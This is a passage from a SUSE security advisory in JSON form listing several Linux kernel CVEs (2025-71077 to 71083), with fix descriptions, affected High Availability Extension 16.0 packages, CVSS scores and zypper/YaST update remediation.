"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
